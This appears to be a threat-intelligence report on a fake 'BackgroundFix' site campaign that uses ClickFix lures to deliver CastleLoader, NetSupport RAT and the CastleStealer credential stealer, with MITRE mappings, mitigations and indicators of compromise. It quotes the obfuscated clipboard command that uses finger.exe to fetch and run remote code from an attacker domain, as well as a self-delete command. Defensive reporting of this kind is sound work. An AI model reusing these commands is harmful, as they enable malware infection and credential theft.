ClickFix Removes Your Background but Leaves the Malware

A malicious “BackgroundFix” image-editing site lures victims into pasting a clipboard command that stages CastleLoader, which then drops NetSupport RAT and a custom .NET stealer dubbed CastleStealer to exfiltrate browser credentials, wallet data, Telegram sessions, and screenshots. The chain employs reflective PE loading, process hollowing, APC injection, layered RC4/ChaCha20/AES encryption for C2 and payloads, and numerous evasions; indicators include specific payload URLs, domains, IP:port C2s, and file hashes. #CastleLoader #CastleStealer

Keypoints

BackgroundFix sites present a fake image-background removal UI that, after a victim checks “I’m not a robot”, copies a malicious cmd payload to the clipboard and beacons telemetry to the actor’s log-checkbox.php.
The initial clickfix-based payload uses finger.exe to fetch and execute a bat payload from an attacker-controlled fingerd server (cheeshomireciple[.]com), which stages CastleLoader rather than uploading or processing images.
CastleLoader deploys a multi-stage pipeline: a Python-based downloader that runs XOR/RC4-encrypted shellcode, a first-stage shellcode that abuses ReplaceTextW to execute decrypted payloads, and a reflective PE loader that maps an embedded PE and rewrites the PEB before execution.
Delivered payloads include NetSupport RAT (disk persistence via Scheduled Task) and CastleStealer, an obfuscated .NET stealer that harvests Chromium/Firefox credentials, wallet IndexedDB vaults, Telegram tdata, and takes screenshots for exfiltration.
The loader and stealer use multiple evasions: direct NtAllocateVirtualMemory calls to bypass VirtualAlloc hooks, API hashing and string XOR obfuscation, Russian-locale kill-switch, Restart Manager for locked files, and process hollowing/APC injection into PowerShell.
Network and forensic IOCs are explicit and actionable: several hxxps payload/C2 domains (trindastal, obelnamevalf, brionter), the CastleStealer C2 IP 38.146.28[.]30:22989, payload hashes, and a campaign UUID and auth token; mitigations include disabling Run dialog, blocking outbound TCP/79, and enforcing Chrome App-Bound Encryption (ABE).

MITRE Techniques

[T1204] User Execution – Victim interaction triggers the chain when the user checks the “I’m not a robot” box and pastes a clipboard command: (‘%COMSPEC% /k s^t^a^r^t “” /min for /f “skip=8 delims=” %h in (‘f^^i^^n^^g^^e^^r nrLeDHDESi@cheeshomireciple[.]com’) do call %h & exit …’).
[T1059.003] Command and Scripting Interpreter: Windows Command Shell – The attack uses cmd.exe batch constructs and chained for/call execution to run fetched commands: (‘%COMSPEC% /k s^t^a^r^t “” /min for /f “skip=8 delims=” %h in (‘f^^i^^n^^g^^e^^r …’) do call %h’).
[T1105] Ingress Tool Transfer – Multiple stages and legitimate utilities are fetched from the web (e.g., Python embeddable and subsequent payloads): (‘curl.exe downloads the legitimate Python Software Foundation embeddable distribution from python.org, saving it with a .pdf extension’).
[T1218] Signed Binary Proxy Execution (regsvr32 / proxy execution) – The loader references a signed-binary style launch method intended to invoke regsvr32, though mis-encoded here: (‘launch_method: 4 is supposed to invoke regsvr32.exe. The XOR-decoded helper string in the binary actually spells regsrv32.exe’).
[T1055] Process Injection – The loader and stealer perform in-memory injection techniques including APC injection and process hollowing into PowerShell: (‘…launch method 7 for APC injection…’ and ‘process hollowing into PowerShell’).
[T1113] Screen Capture – The loader/stealer captures desktop screenshots for exfiltration as part of task workflows: (‘capture a desktop screenshot for exfiltration’).
[T1555.003] Credentials from Web Browsers – CastleStealer extracts Chromium login databases, cookies, Local State DPAPI/AES master keys, and IndexedDB wallet vaults: (‘reads Login Data (the SQLite password store), cookies.sqlite, and Local State (which contains the AES master key encrypted with DPAPI)’).
[T1070] Indicator Removal on Host (Self-deletion) – The malware cleans up via a self-delete batch trick using ping delay and del: (‘cmd.exe /C ping 1.0.0.1 & del “”‘).
[T1041] Exfiltration Over C2 Channel – The stealer and loader send host fingerprints, screenshots, and task results over encrypted channels and a raw TCP C2: (‘traffic to 38.146.28[.]30:22989 runs over a raw TCP socket’).
[T1027] Obfuscated Files or Information – Multiple layers of string obfuscation, XOR/RC4/ChaCha20/AES encryption, and a custom .NET string decryptor hinder static analysis: (‘Every meaningful string constant in the binary is wrapped in a call to a custom decryptor’ and RC4/ChaCha20 usage descriptions).

Indicators of Compromise

[File hash] payload identification – bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92, ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9.
[URL / Domain] payload and C2 infrastructure – hxxps://trindastal[.]com/8250d149-9bf8-566d-9d7d-ea925eae0a4c/, hxxps://obelnamevalf[.]org/OaTS7yE9zd/default, and other BackgroundFix domains such as bg-transparency[.]online and bg-ready[.]online (and several more listed in the article).
[IP:Port] active C2 endpoints – 38.146.28[.]30:22989 (CastleStealer C2); NetSupport RAT C2 examples include poronto[.]com:688 and giovettiadv[.]com:688.
[File path] persistence / install locations – %ProgramData%CeoliauDDabkina (NetSupport install path), and staged payload names like net40.bin (CastleStealer) and client32.exe (NetSupport client inside ZIP).
[Filenames] delivered payloads and stages – net40.bin (obfuscated .NET stealer), client32.exe (NetSupport), python embeddable renamed with .pdf extension, and stage URLs such as /loc8 and /v8 endpoints on trindastal[.]com.
[Campaign identifiers / tokens] build and auth artifacts – campaign UUID b47e1791-82ba-544f-9aab-ebbdd36d8c89 and auth token/user-agent D63TnQ3WhSnjI0yVKaILRu8U1WttdnE used by CastleLoader.

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print